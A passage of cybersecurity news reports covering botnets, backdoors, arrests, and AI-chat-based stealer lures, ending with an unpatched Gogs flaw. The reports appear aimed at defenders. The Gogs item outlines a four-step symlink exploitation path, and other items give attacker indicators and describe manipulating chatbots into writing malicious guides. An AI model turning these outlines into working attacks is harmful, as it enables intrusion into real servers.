“Technically, it diverges from standard Mirai by utilizing Netlink kernel sockets for stealthy, event-driven process monitoring (replacing noisy filesystem polling), and employing payload polymorphism to evade static defenses.” Specifically, it tries to maintain exclusive control over the host by terminating other processes that match specific path patterns, fail internal checks, or have already been classified as hostile. Broadside extends beyond denial-of-service attacks, as it attempts to harvest system credential files (/etc/passwd and /etc/shadow) with an aim to establish a strategic foothold into compromised devices. Mirai is a formidable botnet that has spawned several variants since its source code was leaked in 2016. LLM flaws persist indefinitely NCSC Says Prompt Injections Might Never Go Away The U.K.

National Cyber Security Centre said prompt injections – which refer to flaws in generative artificial intelligence (GenAI) applications that allow them to parse malicious instructions to generate content that’s otherwise not possible – “will never be properly mitigated” and that it’s important to raise awareness about the class of vulnerability, as well as designing systems that “constrain the actions of the system, rather than just attempting to prevent malicious content reaching the LLM.” VaaS crackdown nets 193 arrests Europol Arrests 193 in Connection with VaaS Crackdown Europol’s Operational Taskforce (OTF) GRIMM has arrested 193 individuals and disrupted criminal networks that have fueled the growth of violence-as-a-service (VaaS). The task force was launched in April 2025 to combat the threat, which involves recruiting young, inexperienced perpetrators to commit violent acts. “These individuals are groomed or coerced into committing a range of violent crimes, from acts of intimidation and torture to murder,” Europol said . Many of the criminals involved in the schemes are alleged to be members of The Com, a loosely-knit collective comprising primarily English speakers who are involved in cyber attacks, SIM swaps, extortion, and physical violence.

Hack tools seized in Poland Poland Arrests 3 Ukrainians for Alleged Attempt to Sabotage IT Systems Polish law enforcement arrested three Ukrainian nationals for allegedly attempting to damage IT systems in the country using specialized hacking equipment after their vehicle was stopped and inspected. They have been charged with fraud, computer fraud, and acquiring computer equipment and software adapted to commit crimes, including damage to computer data of particular importance to the country’s defense. “Officers thoroughly searched the vehicle’s interior. They found suspicious items that could even be used to interfere with the country’s strategic IT systems, breaking into IT and telecommunications networks,” authorities said .

“During the investigation, officers seized a spy device detector, advanced Flipper hacking equipment, antennas, laptops, a large number of SIM cards, routers, portable hard drives, and cameras.” The three men, of ages between 39 and 43, claimed to be computer scientists and “were visibly nervous,” but did not give reasons as to why they were carrying such tools in the first place, and pretended not to understand what was being said to them, officials said. Teen data thief caught Spain Nabs Teen Hacker for Allegedly Stealing 64M Records The National Police in Spain have arrested a suspected 19-year-old hacker in Barcelona, for allegedly stealing and attempting to sell 64 million records obtained from breaches at nine companies. The defendant is said to have used six online accounts and five pseudonyms to advertise and sell the stolen databases. The teen faces charges related to involvement in cybercrime, unauthorized access, and disclosure of private data, and privacy violations.

“The cybercriminal accessed nine different companies where he obtained millions of private personal records that he later sold online,” authorities alleged . In a related development, Ukrainian police officials announced the arrest of a 22-year-old cybercriminal who used a custom malware he independently created to automatically hack user accounts on social networks and other platforms. The compromised accounts were then sold on hacker forums. Most of the victims were based in the U.S.

and various European countries. The Bukovyn resident is also accused of administering a bot farm with more than 5,000 profiles in various social networks in order to implement various shadow schemes and transactions. Millions lost via fake banking apps Russia Dismantles NFC-Relay Operation Russian police said they have dismantled a criminal enterprise that stole millions from bank customers in the country using malware built on NFCGate , a legitimate open-source tool increasingly exploited by cybercriminals worldwide. To that end, three suspects have been arrested for distributing NFC-capable malware through WhatsApp and Telegram, disguising it as software from legitimate banks.

Victims were first approached via phone and persuaded to install a fraudulent banking app. During the fake “authorization” process, they were guided to hold their bank card to the back of their smartphone and enter their PIN — a step that enabled the attackers to harvest card credentials and withdraw funds from ATMs anywhere in the country without the cardholder’s involvement. Preliminary losses exceed 200 million rubles (about $2.6 million). Botnets exploit React flaw React2Shell Comes Under Extensive Exploitation The recently disclosed React security flaw ( React2Shell , aka CVE-2025-55182) has come under widespread exploitation, including targeting smart home devices, according to Bitdefender .

These include smart plugs, smartphones, NAS devices, surveillance systems, routers, development boards, and smart TVs. These attacks have been found to deliver Mirai and RondoDox botnet payloads. Significant probing activity has been detected from Poland, the U.S., the Netherlands, Ireland, France, Hong Kong, Singapore, China, and Panama. This indicates “broad global participation in opportunistic exploitation,” the company said.

Threat intelligence firm GreyNoise said it observed 362 unique IP addresses across ~80 countries attempting exploitation as of December 8, 2025. “Observed payloads fall into distinct groups: miners, dual-platform botnets, OPSEC-masked VPN actors, and recon-only clusters,” it added. Linux malware evades detection New GhostPenguin Linux Backdoor Spotted Cybersecurity researchers have discovered a previously undocumented Linux backdoor named GhostPenguin. A multi-thread backdoor written in C++, it can collect system information, including IP address, gateway, OS version, hostname, and username, and send it to a command-and-control (C&C) server during a registration phase.

“It then receives and executes commands from the C&C server. Supported commands allow the malware to provide a remote shell via ‘/bin/sh,’ and perform various file and directory operations, including creating, deleting, renaming, reading, and writing files, modifying file timestamps, and searching for files by extension,” Trend Micro said . “All C&C communication occurs over UDP port 53.” The discovery comes as Elastic detailed a new syscall hooking technique called FlipSwitch that has been devised in the aftermath of fundamental changes introduced to the Linux kernel 6.9 to allow malware to hide its presence on infected hosts. “Traditional rootkit techniques relied on direct syscall table manipulation, but modern kernels have moved to a switch-statement based dispatch mechanism,” security researcher Remco Sprooten said .

“Instead of modifying the syscall table, it locates and patches specific call instructions inside the kernel’s dispatch function. This approach allows for precise and reliable hooking, and all changes are fully reverted when the module is unloaded.” Crypto laundering plea deal California Resident Pleads Guilty to Laundering $263M in Stolen Crypto Heist Evan Tangeman, a 22-year-old California resident, pleaded guilty to RICO conspiracy charges after being accused of buying homes and laundering $3.5 million on behalf of a criminal gang that stole cryptocurrency through social engineering schemes. “The enterprise began no later than October 2023 and continued through at least May 2025. It grew from friendships developed on online gaming platforms and consisted of individuals based in California, Connecticut, New York, Florida, and abroad,” the Justice Department (DoJ) said .

“Tangeman was a money launderer for the group that also included database hackers, organizers, target identifiers, callers, and residential burglars targeting hardware virtual currency wallets.” Members of the group were previously charged with stealing more than $263 million worth of cryptocurrency from a victim in Washington, D.C. Spyware warnings go global Apple and Google Send New Spyware Alerts Apple and Google have sent a new round of spyware notifications to users in nearly 80 countries, according to a report from Reuters. There are currently no details about what kind of spyware the victims were targeted with. Neither company provided information on the number of users targeted or who they thought was behind the surveillance efforts.

EU greenlights Meta’s ad model E.U. Approves Meta’s Tweaked Pay-or-Consent Ad Model The European Commission has given its stamp of approval to a Meta proposal to give Instagram and Facebook users an option to share less personal data and see fewer personalized ads. The new option goes into effect in January 2026. “Meta will give users the effective choice between consenting to share all their data and seeing fully personalized advertising, and opting to share less personal data for an experience with more limited personalized advertising,” the Commission said .

The move comes after the social media giant was fined €200 million in April 2025 (then $227 million) for violating the bloc’s Digital Markets Act (DMA) over the binary choice it gives E.U. users to either pay to access ad-free versions of the platforms or agree to being tracked in exchange for targeted ads. In a post last week, Austrian non-profit None of Your Business (noyb) published a survey that said “when there’s a ‘pay,’ a ‘consent,’ and an ‘advertising, but no tracking’ option, […] 7 out of 10 people then choose the ‘advertising, but no tracking’ option.” Mass alert for Lumma victims New Zealand Notifies Citizens Infected by Lumma Stealer New Zealand’s National Cyber Security Centre (NCSC) said it’s notifying around 26,000 users who have been infected with Lumma Stealer , in what it described as the first large-scale public outreach. “The malicious software is designed to steal sensitive information, like email addresses and passwords, from devices typically for the purposes of fraud or identity theft,” it said .

“The use of Lumma Stealer and other similar malware by cyber criminals is an ongoing international issue.” Update closes hijack flaw Notepad++ Releases Update to Address Exploited Critical Flaw Notepad++ has released version 8.8.9 to fix a critical flaw in the open-source text and source code editor for Windows. This bug, according to security researcher Kevin Beaumont, was being abused by threat actors in China to hijack traffic from WinGUp (the Notepad++ updater), redirect it to malicious servers, and then trick people into downloading malware. “Verify certificate and signature on downloaded update installer,” reads the release notes for version 8.8.9. “The review of the reports led to the identification of a weakness in the way the updater validates the integrity and authenticity of the downloaded update file,” Notepad++ maintainers said .

“In case an attacker is able to intercept the network traffic between the updater client and the Notepad++ update infrastructure, this weakness can be leveraged by an attacker to prompt the updater to download and execute an unwanted binary (instead of the legitimate Notepad++ update binary).” Telegram tightens cyber controls Telegram Increases Crackdown on Cybercrime A new report from Kaspersky examining more than 800 blocked Telegram channels that existed between 2021 and 2024 has revealed that the “median lifespan of a shadow Telegram channel increased from five months in 2021-2022 to nine months in 2023-2024” The messaging app also appears to be increasingly blocking cybercrime-focused channels since October 2024, prompting threat actors to migrate to other platforms. UK targets info warfare actors U.K. Sanctions Russian and Chinese Firms Over Information Warfare The U.K. has imposed new sanctions against several Russian and Chinese organizations accused of undermining the West through cyber attacks and influence operations.

The actions target two Chinese entities, I-Soon and the Integrity Technology Group (aka Flax Typhoon), as well as a Telegram channel Ryber and its co-owner, Mikhail Zvinchuk, an organization called Pravfond that’s believed to be a front for the GRU, and the Centre for Geopolitical Expertise, a Moscow-based think tank founded by Aleksandr Dugin. “I-Soon and Integrity Tech are examples of the threat posed by the cyber industry in China, which includes information security companies, data brokers (that collect and sell personal data), and ‘hackers for hire,’” the U.K. government said. “Some of these companies provide cyber services to the Chinese intelligence services.” Millions still using Log4Shell Log4Shell Downloaded Nearly 40M Times This Year A new analysis from Sonatype has revealed that about 13% of all Log4j downloads in 2025 are susceptible to Log4Shell.

“In 2025 alone, there were nearly 300 million total Log4j downloads,” the supply chain security company said . “Of those, about 13% – roughly 40 million downloads — were still vulnerable versions. Given that safe alternatives have been available for nearly four years, every one of those vulnerable downloads represents risk that could have been avoided.” China, the United States, India, Japan, Brazil, Germany, the United Kingdom, Canada, South Korea, and France accounted for a huge chunk of the vulnerable downloads. India weighs constant tracking India Mulls Proposal for Phone-Location Surveillance The Indian government is reportedly reviewing a telecom industry proposal to force smartphone firms to enable satellite location tracking that is always activated for better surveillance, with no option for users to disable it, Reuters revealed .

The idea is to get precise locations when legal requests are made to telecom firms during investigations, the news agency added. The move has been opposed by Apple, Google, and Samsung. Amnesty International has called the plan “deeply concerning.” GlobalProtect scans spike Scans for Palo Alto Networks GlobalProtect Portals Surge Again A “concentrated spike” comprising more than 7,000 IP addresses has been observed attempting to log into Palo Alto Networks GlobalProtect portals. The activity, which originated from infrastructure operated by 3xK GmbH, was observed on December 2, 2025.

GreyNoise said the December wave shares three identical client fingerprints with a prior wave observed between late September and mid-October. The threat intelligence firm said it also recorded a surge in scanning against SonicWall SonicOS API endpoints a day later. Both the attack waves have been attributed to the same threat actor. OpenAI warns of AI misuse OpenAI Warns of Cybersecurity Risks from AI Models Artificial intelligence (AI) company OpenAI said there is a need for strengthening resilience as cyber capabilities in AI models advance rapidly, posing dual-use risks.

To that end, the firm said it’s investing in safeguards to help ensure these capabilities mainly benefit defensive uses and limit their use for malicious purposes. This includes: (1) Training the model to refuse or safely respond to harmful requests, (2) Maintaining system-wide monitoring across products that use frontier models to detect malicious cyber activity, and (3) End-to-end red teaming. “As these capabilities advance, OpenAI is investing in strengthening our models for defensive cybersecurity tasks and creating tools that enable defenders to more easily perform workflows such as auditing code and patching vulnerabilities,” the company said . “Our goal is for our models and products to bring significant advantages for defenders, who are often outnumbered and under-resourced.” Android malware fakes ransomware DroidLock Locks Android Devices with a Ransomware-Like Overlay Spanish Android users have become the target of a new malware called DroidLock that propagates via dropper apps hosted on phishing websites.

“It has the ability to lock device screens with a ransomware-like overlay and illegally acquire app lock credentials, leading to a total takeover of the compromised device,” Zimperium said . “It employs deceptive system update screens to trick victims and can stream and remotely control devices via VNC. The malware also exploits device administrator privileges to lock or erase data, capture the victim’s image with the front camera, and silence the device.” In all, it supports 15 distinct commands. While the malware does not actually have the ability to encrypt files, it displays a scary overlay that instructs victims to contact a Proton email address within 24 hours or risk getting their files destroyed.

Like other Android malware of its kind, it leverages accessibility services to carry out its malicious activities, including changing the device lock screen PIN or password, effectively locking users out. It also serves traditional WebView overlays atop targeting apps to capture credentials. Google tightens HTTPS validation New Security Requirements for HTTPS Certificate Issuers Google has announced that the Chrome Root Program and the CA/Browser Forum have taken steps to sunset 11 legacy methods for Domain Control Validation, a security-critical process designed to ensure certificates are only issued to the legitimate domain operator. “By retiring these outdated practices, which rely on weaker verification signals like physical mail, phone calls, or emails, we are closing potential loopholes for attackers and pushing the ecosystem toward automated, cryptographically verifiable security,” the company said .

The deprecation is expected to be carried out in phases and completed by March 2028. Torrent hides Agent Tesla Fake Leonardo DiCaprio Movie Torrent Drops Agent Tesla Cybersecurity researchers have warned of a new campaign that uses a fake torrent for the Leonardo DiCaprio starrer One Battle After Another as a launchpad for a complex infection chain that drops Agent Tesla malware. “Instead of the expected video file, users unknowingly download a compilation of PowerShell scripts and image archives that build into a memory-resident command-and-control (C2) agent, also known as a trojan (RAT – Remote Access Trojan) under the name of Agent Tesla,” Bitdefender said . “This type of malware is designed with a single purpose: to provide attackers with unfettered access to the victim’s Windows computer.” The attack is part of a growing trend of embedding malware in bogus multimedia files.

Earlier this May, a lure for Mission: Impossible – The Final Reckoning was used to spread Lumma Stealer. Leaked secrets flood Docker Hub Over 10K Docker Hub images Leak Secrets A new study from Flare has found that more than 10,000 Docker Hub container images are exposing credentials to production systems, CI/CD databases, or large language model (LLM) keys. “42% of exposed images contained five or more secrets each, meaning a single container could unlock an entire cloud environment, CI/CD pipeline, and database,” the company said . “AI LLM model keys were the most frequently leaked credentials, with almost 4,000 exposed, revealing how fast AI adoption has outpaced security controls.” The exposure represents severe risks, as it enables full access to cloud environments, Git repositories, CI/CD systems, payment integrations, and other core infrastructure components.

VS Code trojans disguised as PNGs 19 VS Code Extensions Contain Trojan Posing as PNG As many as 19 Microsoft Visual Studio Code (VS Code) extensions have been identified on the official Marketplace, with most of them embedding a malicious file that masquerades as a PNG image. The campaign, active since February 2025, was discovered last week. “The malicious files abused a legitimate npm package [path-is-absolute] to avoid detection and crafted an archive containing malicious binaries that posed as an image: A file with a PNG extension,” ReversingLabs researcher Petar Kirhmajer said . “For this latest campaign, the threat actor modified it by adding a few malicious files.

However, it’s important to note that these changes to the package are only available when it is installed locally through the 19 malicious extensions, and they are not actually part of the package hosted on npm.” The net effect is that the weaponized package is used to launch the attack as soon as one of the malicious extensions is used and VS Code is launched. The main purpose of the malicious code is to decode what appears to be a PNG file (“banner.png”), but, in reality, is an archive containing two binaries that are executed using the “cmstp.exe” living-off-the-land binary (LOLBin) by means of a JavaScript dropper. “One of these binaries is responsible for closing the LOLBin by emulating a key press, while the other binary is a more complicated Rust trojan,” ReversingLabs said. The extensions have since been removed by Microsoft from the Marketplace.

ValleyRAT builder dissected ValleyRAT’s Modular System Analyzed Check Point Research said it was able to reverse engineer the ValleyRAT (aka Winos or Winos4.0) backdoor and its plugins by examining a publicly leaked builder and its development structure. “The analysis reveals the advanced skills of the developers behind ValleyRAT, demonstrating deep knowledge of Windows kernel and user-mode internals, and consistent coding patterns suggesting a small, specialized team,” the cybersecurity company said . “The ‘Driver Plugin’ contains an embedded kernel-mode rootkit that, in some cases, retains valid signatures and remains loadable on fully updated Windows 11 systems, bypassing built-in protection features.” Specifically, the plugin facilitates stealthy driver installation, user-mode shellcode injection via APCs, and forceful deletion of AV/EDR drivers. The rootkit is based on the publicly available open-source project Hidden.

One of the other plugins is a login module that is designed to load additional components from an external server. ValleyRAT is attributed to a Chinese cybercrime group known as Silver Fox . Approximately 6,000 ValleyRAT-related samples have been detected in the wild between November 2024 and November 2025, in addition to 30 distinct variants of the ValleyRAT builder and 12 variants of the rootkit driver. AI chat guides spread stealers Shared ChatGPT and Grok Guides Distribute Infotealers In a new campaign , threat actors are abusing the ability to share chats on OpenAI ChatGPT, DeepSeek, and Grok to surface them in search results, either via malvertising or search engine optimization (SEO) poisoning, to trick users into installing stealers like AMOS Stealer or Shamus when searching for “sound not working on macOS,” “clear disk space on macOS,” or ChatGPT Atlas on search engines like Google.

The chat sessions are shared through sponsored results under the guise of troubleshooting or installation guides and include ClickFix-style instructions to launch the terminal and paste a command to address issues faced by the user. “Attackers are systematically weaponizing multiple AI platforms with SEO poisoning, and that it is not isolated to a single AI platform, page, or query, ensuring victims encounter poisoned instructions regardless of which tool they trust,” Huntress said . “Instead, multiple AI-style conversations are being surfaced organically through standard search terms, each pointing victims toward the same multi-stage macOS stealer.” The campaign has been described as a deliberate, widespread poisoning campaign targeting common troubleshooting queries, with the bad actors using prompt engineering to force ChatGPT into generating a convincing installation guide with the malicious instructions. The development comes as platforms like itch.io and Patreon are being used by threat actors to distribute Lumma Stealer.

“Newly created Itch.io accounts spam comments in different legitimate games, with templated text messages that show Patreon links to supposed game updates,” G DATA said . These links direct to ZIP archives containing a malicious executable that’s compiled with nexe and runs a six-levels of anti-analysis checks before dropping the stealer malware. Cybersecurity isn’t just a tech issue anymore—it’s part of daily life. The same tools that make work and communication easier are the ones attackers now use to slip in unnoticed.

Every alert, patch, or policy shift connects to a bigger story about how fragile digital trust has become. As threats keep evolving, staying aware is the only real defense. The Threatsday Bulletin exists for that reason—to cut through the noise and show what actually matters in cybersecurity right now. Read on for this week’s full rundown of breaches, discoveries, and decisions shaping the digital world.

Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

NANOREMOTE Malware Uses Google Drive API for Hidden Control on Windows Systems

Cybersecurity researchers have disclosed details of a new fully-featured Windows backdoor called NANOREMOTE that uses the Google Drive API for command-and-control (C2) purposes. According to a report from Elastic Security Labs, the malware shares code similarities with another implant codenamed FINALDRAFT (aka Squidoor) that employs Microsoft Graph API for C2. FINALDRAFT is attributed to a threat cluster known as REF7707 (aka CL-STA-0049, Earth Alux, and Jewelbug). “One of the malware’s primary features is centered around shipping data back and forth from the victim endpoint using the Google Drive API,” Daniel Stepanic, principal security researcher at Elastic Security Labs, said.

“This feature ends up providing a channel for data theft and payload staging that is difficult for detection. The malware includes a task management system used for file transfer capabilities that include queuing download/upload tasks, pausing/resuming file transfers, canceling file transfers, and generating refresh tokens.” REF7707 is believed to be a suspected Chinese activity cluster that has targeted governments, defense, telecommunication, education, and aviation sectors in Southeast Asia and South America as far back as March 2023, per Palo Alto Networks Unit 42. In October 2025, Broadcom-owned Symantec attributed the hacking group to a five-month-long intrusion targeting a Russian IT service provider. The exact initial access vector used to deliver NANOREMOTE is currently not known.

However, the observed attack chain includes a loader named WMLOADER that mimics Bitdefender’s crash handling component (“BDReinit.exe”) and decrypts shellcode responsible for launching the backdoor. Written in C++, NANOREMOTE is equipped to perform reconnaissance, execute files and commands, and transfer files to and from victim environments using the Google Drive API. It’s also preconfigured to communicate with a hard-coded, non-routable IP address over HTTP to process requests sent by the operator and send the response back. “These requests occur over HTTP where the JSON data is submitted through POST requests that are Zlib compressed and encrypted with AES-CBC using a 16-byte key (558bec83ec40535657833d7440001c00),” Elastic said.

“The URI for all requests use /api/client with User-Agent (NanoRemote/1.0).” Its primary functionality is realized through a set of 22 command handlers that allow it to collect host information, carry out file and directory operations, run portable executable (PE) files already present on disk, clear cache, download/upload files to Google Drive, pause/resume/cancel data transfers, and terminate itself. Elastic said it identified an artifact (“ wmsetup.log “) uploaded to VirusTotal from the Philippines on October 3, 2025, that’s capable of being decrypted by WMLOADER with the same 16-byte key to reveal a FINALDRAFT implant, indicating that the two malware families are likely the work of the same threat actor. It’s unclear as to why the same hard-coded key is being used across both of them. “Our hypothesis is that WMLOADER uses the same hard-coded key due to being part of the same build/development process that allows it to work with various payloads,” Stepanic said.

“This appears to be another strong signal suggesting a shared codebase and development environment between FINALDRAFT and NANOREMOTE.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

The Impact of Robotic Process Automation (RPA) on Identity and Access Management

As enterprises refine their strategies for handling Non-Human Identities (NHIs), Robotic Process Automation (RPA) has become a powerful tool for streamlining operations and enhancing security. However, since RPA bots have varying levels of access to sensitive information, enterprises must be prepared to mitigate a variety of challenges. In large organizations, bots are starting to outnumber human employees, and without proper identity lifecycle management, these bots increase security risks. RPA impacts Identity and Access Management (IAM) by managing bot identities, enforcing least-privilege access and ensuring auditability across all accounts.

Continue reading to learn more about RPA, its challenges with IAM and best practices organizations should follow to secure RPA within IAM. What is Robotic Process Automation (RPA)? Robotic Process Automation (RPA) uses bots to automate repetitive tasks that are traditionally performed by human users. In the context of IAM, RPA plays an essential role in streamlining the user lifecycle, including provisioning, deprovisioning and secure access to credentials.

These RPA bots act as NHIs and require governance just as human users do for authentication, access controls and privileged session monitoring. As RPA adoption grows, IAM systems must consistently manage both human identities and NHIs within a unified security framework. Here are the key benefits of RPA: Improved efficiency and speed: RPA automates time-consuming, repetitive tasks like provisioning and deprovisioning, enabling IT teams to focus on higher-priority tasks. Better accuracy: RPA minimizes human error and reduces the risk of misconfigurations by following pre-defined scripts.

Bots also automate credential handling and eliminate common issues like password reuse. Enhanced security: RPA strengthens IAM by triggering immediate deprovisioning once an employee leaves an organization. Automated bots can also detect and respond to behavioral anomalies in real time, limiting the impact of unauthorized access. Stronger compliance: RPA supports regulatory compliance mandates by automatically logging every bot action and enforcing access policies.

Combined with zero-trust security principles, RPA enables continuous verification of all identities — human or machine. Challenges RPA introduces into IAM As organizations scale their use of RPA, several challenges emerge that can weaken the efficiency of existing IAM strategies, including bot management, larger attack surfaces and integration difficulties. Managing bots RPA bots are taking on more critical tasks across enterprises, and managing their identities and access becomes a top priority. Unlike human users, bots work silently in the background but still require authentication and authorization.

Without appropriate identity governance, improperly monitored bots can create security gaps within an organization’s IAM. A common problem is how bots store credentials, often embedding hardcoded passwords or API keys in scripts or configuration files. Increased attack surface Each RPA bot has a new NHI, and each NHI introduces a potential attack vector for cybercriminals to exploit. Without strictly enforcing the Principle of Least Privilege (PoLP), bots may be overprovisioned with access that exceeds their needs for repetitive tasks.

If compromised, bots can be used to move laterally within a network or exfiltrate sensitive data. Securing bots’ privileged access and managing their credentials with Just-in-Time (JIT) access is crucial to maintaining zero-trust security. Integration difficulties Many legacy IAM systems were not built with modern RPA integrations in mind, making it challenging for enterprises to enforce consistent access policies across both human users and NHIs. Integration gaps can result in unmanaged credentials, insufficient audit trails and inconsistent enforcement of access controls.

Without alignment between RPA and IAM, organizations risk having less visibility and inconsistencies across automated processes. Best practices for securing RPA within IAM Securing RPA within IAM requires more than just granting bots access; organizations must treat automated processes with the same attention to detail as they do for human users. Here are some best practices to ensure RPA deployments remain secure and aligned with zero-trust security principles. 1.

Prioritize bot identities Treating RPA bots as first-class identities is crucial to maintaining strong IAM. Since bots interact with core systems and often operate with elevated privileges, it’s important to ensure each bot has only the minimum level of access required for its specific task. Each bot should be assigned an identity with its own unique credentials so they are never shared or reused across other bots or services. This approach to bot management allows security teams to grant or revoke access without disrupting broader workflows and to better track each bot’s activities.

1. Use a secrets manager RPA bots typically interact with critical systems and APIs, relying on credentials or SSH keys to function. Storing these secrets in plaintext configuration files or scripts makes them easy targets for cybercriminals and difficult to securely rotate. A dedicated secrets management tool like Keeper® ensures that all credentials are encrypted and centrally managed in a zero-knowledge vault.

Secrets can be retrieved at runtime, so they never reside in memory or on a device. 3. Implement PAM Bots that perform repetitive, administrative tasks often require privileged access, making Privileged Access Management (PAM) essential. PAM solutions should enforce JIT access, ensuring bots receive privileged access only when needed and for a limited time.

With session monitoring and recording to maintain transparency and detect unusual bot activity, implementing PAM eliminates standing access and helps prevent privilege escalation. 4. Strengthen authentication with MFA Human users managing RPA bots must be required to authenticate using Multi-Factor Authentication (MFA). Since MFA is not practical for bot accounts themselves, having an extra layer of protection for the users managing them helps prevent unauthorized access to critical systems, sensitive data and privileged credentials.

In addition, organizations should adopt Zero-Trust Network Access (ZTNA) principles by continuously verifying bot identities and context, not only at login but throughout each privileged session. Secure the future of automation with IAM Automation continues to transform how enterprises operate, largely driven by the rise of NHIs like RPA bots. To keep up with this technological evolution, organizations must adjust their IAM strategies to accommodate and secure both human users and automated bots. KeeperPAM® helps enterprises close potential security gaps, such as credential theft and privilege misuse, by providing a unified platform for managing credentials, enforcing PoLP, monitoring privileged sessions and managing the full identity lifecycle of every identity — human or not.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

WIRTE Leverages AshenLoader Sideloading to Install the AshTag Espionage Backdoor

An advanced persistent threat (APT) known as WIRTE has been attributed to attacks targeting government and diplomatic entities across the Middle East with a previously undocumented malware suite dubbed AshTag since 2020 . Palo Alto Networks Unit 42 is tracking the activity cluster under the name Ashen Lepus . Artifacts uploaded to the VirusTotal platform show that the threat actor has trained its sights on Oman and Morocco, indicating an expansion in operational scope beyond the Palestinian Authority, Jordan, Iraq, Saudi Arabia, and Egypt. The company told The Hacker News said it has observed “scores of unique lures” disseminated across the Middle East, indicating a “persistent and wide-reaching campaign” confined to government and diplomatic entities in the region.

More than a dozen entities are estimated to have been targeted, although it’s suspected that the real number could be higher. “Ashen Lepus remained persistently active throughout the Israel-Hamas conflict, distinguishing it from other affiliated groups whose activities decreased over the same period,” the cybersecurity company said in a report shared with The Hacker News. “Ashen Lepus continued with its campaign even after the October 2025 Gaza ceasefire, deploying newly developed malware variants and engaging in hands-on activity within victim environments.” WIRTE, which overlaps with an Arabic-speaking, politically motivated cluster known as Gaza Cyber Gang (aka Blackstem, Extreme Jackal, Molerats, or TA402), is assessed to be active since at least 2018. According to a report from Cybereason, both Molerats and APT-C-23 (aka Arid Viper , Desert Varnish, or Renegade Jackal) are two main sub-groups of the Hamas cyberwarfare division.

It’s primarily driven by espionage and intelligence collection, targeting government entities in the Middle East to meet its strategic objectives. “Specifically, the connection between WIRTE (Ashen Lepus) to the broader Gaza Cyber Gang is primarily evidenced by code overlaps and similarities,” Unit 42 researchers said. “This suggests that while they operate independently, the tools were developed by close entities and they likely share development resources. We have also seen overlap in other groups’ victimology.” In a report published in November 2024, Check Point attributed the hacking crew to destructive attacks exclusively aimed at Israeli entities to infect them with a custom wiper malware referred to as SameCoin, highlighting their ability to adapt and carry out both espionage and sabotage.

The long-running, elusive campaign detailed by Unit 42, going all the way back to 2018, has been found to leverage phishing emails with lures related to geopolitical affairs in the region. A recent increase in lures related to Turkey – e.g., “Partnership agreement between Morocco and Turkey” or “Draft resolutions concerning the State of Palestine” – suggests that entities in the country may be a new area of focus. The attack chains commence with a harmless PDF decoy that tricks recipients into downloading a RAR archive from a file-sharing service. Opening the archive triggers a chain of events that results in the deployment of AshTag.

This involves using a renamed benign binary to sideload a malicious DLL dubbed AshenLoader that, in addition to opening a decoy PDF file to keep up the ruse, contacts an external server to drop two more components, a legitimate executable and a DLL payload called AshenStager (aka stagerx64) that’s again sideloaded to launch the malware suite in memory to minimize forensic artifacts. AshTag is a modular .NET backdoor that’s designed to facilitate persistence and remote command execution, while masquerading as a legitimate VisualServer utility to fly under the radar. Internally, its features are realized by means of an AshenOrchestrator to enable communications and to run additional payloads in memory. These payloads serve different purposes - Persistence and process management Update and removal Screen capture File explorer and management System fingerprinting In one case, Unit 42 said it observed the threat actor accessing a compromised machine to conduct hands-on data theft by staging documents of interest in the C:\Users\Public folder.

These files are said to have been downloaded from a victim’s email inbox, their end goal being the theft of diplomacy-related documents. The documents were then exfiltrated to an attacker-controlled server using the Rclone utility. It’s assessed that data theft has likely occurred across the broader victim population, particularly in environments where advanced detection capabilities are absent. “Ashen Lepus remains a persistent espionage actor, demonstrating a clear intent to continue its operations throughout the recent regional conflict – unlike other affiliated threat groups, whose activity significantly decreased,” the company concluded.

“The threat actors’ activities throughout the last two years in particular highlight their commitment to constant intelligence collection.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Unpatched Gogs Zero-Day Exploited Across 700+ Instances Amid Active Attacks

A high-severity unpatched security vulnerability in Gogs has come under active exploitation, with more than 700 compromised instances accessible over the internet, according to new findings from Wiz. The flaw, tracked as CVE-2025-8110 (CVSS score: 8.7), is a case of file overwrite in the file update API of the Go-based self-hosted Git service. A fix for the issue is said to be currently in the works. The company said it accidentally discovered the zero-day flaw in July 2025 while investigating a malware infection on a customer’s machine.

“Improper symbolic link handling in the PutContents API in Gogs allows local execution of code,” according to a description of the vulnerability in CVE.org. The cloud security company said CVE-2025-8110 is a bypass for a previously patched remote code execution flaw ( CVE-2024-55947 , CVSS score: 8.7) that allows an attacker to write a file to an arbitrary path on the server and gain SSH access to the server. CVE-2024-55947 was addressed by the painters in December 2024. Wiz said the fix put in place by Gogs to resolve CVE-2024-55947 could be circumvented by taking advantage of the fact that Git (and therefore, Gogs) allows symbolic links to be used in git repositories, and those symlinks can point to files or directories outside the repository.

Additionally, the Gogs API allows file modification outside of the regular Git protocol. As a result, this failure to account for symlinks could be exploited by an attacker to achieve arbitrary code execution through a four-step process - Create a standard git repository Commit a single symbolic link pointing to a sensitive target Use the PutContents API to write data to the symlink, causing the system to follow the link and overwrite the target file outside the repository Overwrite “.git/config” (specifically the sshCommand) to execute arbitrary commands As for the malware deployed in the activity, it’s assessed to be a payload based on Supershell , an open-source command-and-control (C2) framework often used by Chinese hacking groups that can establish a reverse SSH shell to an attacker-controlled server (“119.45.176[.]196”). Wiz said that the attackers behind the exploitation of CVE-2025-8110 left behind the created repositories (e.g., “IV79VAew / Km4zoh4s”) on the customer’s cloud workload when they could have taken steps to delete or mark them as private following the infection. This carelessness points to a “smash-and-grab” style campaign, it added.

In all, there are about 1,400 exposed Gogs instances, out of which more than 700 have exhibited signs of compromise, particularly the presence of 8-character random owner/repository names. All the identified repositories were created around July 10, 2025. “This suggests that a single actor, or perhaps a group of actors all using the same tooling, are responsible for all infections,” researchers Gili Tikochinski and Yaara Shriki said. Given that the vulnerability does not have a fix, it’s essential that users disable open-registration, limit exposure to the internet, and scan instances for repositories with random 8-character names.

